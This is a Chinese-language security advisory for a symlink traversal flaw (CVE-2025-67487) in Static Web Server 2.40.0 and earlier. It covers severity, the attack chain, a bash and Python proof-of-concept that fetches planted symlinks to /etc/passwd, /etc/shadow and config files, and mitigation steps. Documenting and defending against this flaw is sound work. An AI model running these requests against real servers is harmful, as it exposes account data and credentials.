CVE-2025-67487: Static Web Server符号链接遍历漏洞

漏洞信息

漏洞编号

CVE-2025-67487

漏洞类型

符号链接遍历/路径遍历

CVSS评分

8.6 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Static Web Server (SWS)

漏洞概述

Static Web Server (SWS)是一款生产级别的Web服务器，专为静态网页文件或资源提供服务。该产品在2.40.0及以下版本中存在符号链接（symlink）安全漏洞，可被恶意利用来访问Web根目录之外的文件或目录。SWS通常不会阻止符号链接逃逸Web服务器的根目录，这意味着如果攻击者能够访问Web服务器的根目录，便可以通过创建符号链接的方式，利用URL访问或目录列表功能来获取Web根目录之外的系统文件。此漏洞的CVSS评分为8.6，属于高危级别，机密性影响为高，但完整性和可用性不受影响。攻击者无需认证即可发起攻击，且无需用户交互。该漏洞由GitHub安全团队（[email protected]）发现并报告，已在2.40.1版本中修复。

技术细节

该漏洞的根本原因在于Static Web Server对符号链接的处理不当。在文件系统中，符号链接是一种特殊类型的文件，它指向另一个文件或目录。正常情况下，Web服务器应当检测并拒绝访问通过符号链接指向Web根目录外部的资源。然而，SWS 2.40.0及以下版本缺乏对符号链接的充分验证机制。攻击者首先需要获得Web服务器根目录的写入权限，然后创建一个指向系统敏感文件（如/etc/passwd、配置文件、密钥文件等）的符号链接。一旦符号链接被创建，攻击者可以通过构造特定的HTTP请求来访问该符号链接，从而绕过Web根目录限制，读取目标文件内容。此外，如果服务器开启了目录列表功能，攻击者也可以通过浏览目录直接访问符号链接指向的外部文件。漏洞的利用复杂度较低（AC:L），攻击向量为网络层面（AV:N），无需任何认证（PR:N）或用户交互（UI:N）。

攻击链分析

STEP 1

步骤1

攻击者获取Web服务器根目录的写入权限，可通过未授权文件上传、配置错误或其他漏洞实现

STEP 2

步骤2

在Web根目录中创建指向系统敏感文件（如/etc/passwd、/etc/shadow、配置文件、SSH密钥等）的符号链接

STEP 3

步骤3

通过HTTP请求访问该符号链接，如curl http://target.com/symlink_name，SWS不会验证符号链接目标是否在Web根目录内

STEP 4

步骤4

成功读取目标文件内容，可能获取用户账户信息、敏感配置、密钥凭据等机密数据

STEP 5

步骤5

如果服务器开启目录列表功能，攻击者也可通过浏览器直接浏览目录来发现和访问符号链接

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/bin/bash
# CVE-2025-67487 PoC - Static Web Server Symlink Traversal
# Target: Static Web Server <= 2.40.0

TARGET_HOST="http://target-server.com"
TARGET_PORT="80"

# Step 1: Create a symlink to /etc/passwd in the web root
# Note: Requires write access to web root directory
# ln -s /etc/passwd webroot/passwd_link

echo "[*] CVE-2025-67487 Symlink Traversal PoC"
echo "[*] Target: $TARGET_HOST:$TARGET_PORT"

# Step 2: Access the symlink via HTTP request
curl -v "$TARGET_HOST:$TARGET_PORT/passwd_link"

# Alternative: Access via directory listing if enabled
curl -v "$TARGET_HOST:$TARGET_PORT/"

# Step 3: Access sensitive files
# ln -s /etc/shadow webroot/shadow_link
curl -v "$TARGET_HOST:$TARGET_PORT/shadow_link"

# Python PoC
cat << 'EOF'
import requests

target = "http://target-server.com"
paths = ["/passwd_link", "/shadow_link", "/.env_link", "/config_link"]

for path in paths:
    try:
        r = requests.get(target + path, timeout=5)
        if r.status_code == 200 and len(r.content) > 0:
            print(f"[+] Found: {path}")
            print(r.text[:500])
    except:
        pass
EOF

影响范围

Static Web Server (SWS) <= 2.40.0

防御指南

临时缓解措施

临时缓解措施：1）立即限制Web服务器根目录的写入权限，确保低权限用户无法创建符号链接；2）配置服务器策略禁止符号链接访问或跟随；3）使用文件完整性监控工具检测Web根目录中新增的符号链接；4）如果可能，启用AppArmor、SELinux等强制访问控制机制限制进程行为；5）考虑使用反向代理限制对Web服务器的访问。最佳方案是尽快升级到官方发布的2.40.1修复版本。